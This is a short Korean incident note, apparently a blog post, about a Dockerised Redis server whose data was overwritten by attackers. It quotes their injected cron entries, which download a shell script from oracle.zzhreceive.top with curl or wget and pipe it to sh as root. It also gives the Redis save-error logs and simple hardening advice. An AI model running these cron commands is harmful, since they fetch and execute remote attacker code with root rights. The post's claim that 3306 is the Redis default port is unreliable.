문제사항
- 도커를 통해 레디스컨테이너를 정상적으로 실행시킨 후 일정시간이 지나면 아래와 같이이상한 값이 계속 저장됐다
*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh
*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh
*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh
*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh- 로그를 살펴보니 저장에 실패했다는 문구가 나왔다.
1:M 30 May 2021 10:48:36.065 * 100 changes in 300 seconds. Saving...
1:M 30 May 2021 10:48:36.065 * Background saving started by pid 56
56:C 30 May 2021 10:48:36.065 # Failed opening the RDB file root (in server root dir /var/spool/cron) for saving: Permission denied
1:M 30 May 2021 10:48:36.166 # Background saving error
1:M 30 May 2021 10:48:42.076 * 100 changes in 300 seconds. Saving...
1:M 30 May 2021 10:48:42.077 * Background saving started by pid 57
57:C 30 May 2021 10:48:42.077 # Failed opening the RDB file root (in server root dir /var/spool/cron) for saving: Permission denied
1:M 30 May 2021 10:48:42.177 # Background saving error
1:M 30 May 2021 10:48:48.087 * 100 changes in 300 seconds. Saving...
1:M 30 May 2021 10:48:48.088 * Background saving started by pid 58
58:C 30 May 2021 10:48:48.088 # Failed opening the RDB file root (in server root dir /var/spool/cron) for saving: Permission denied
1:M 30 May 2021 10:48:48.188 # Background saving error원인
- 레디스 기본포트
3306에서 해킹을 시도하고 있었던 것. - 다른 클라우드 가상서버를 생성했을 때도 같은 오류가 나서 해킹시도라고 생각하지도 못했다.
- 광범위하게 해킹시도를 하고있나보다.
해결방안
- 기본포트를 사용하지 않으면 된다.
- 혹은 redis에 접속 비밀번호를 설정한다.
- 또 외부 접속을 막기 위해 방화벽 설정을 해둔다
💻📝🤯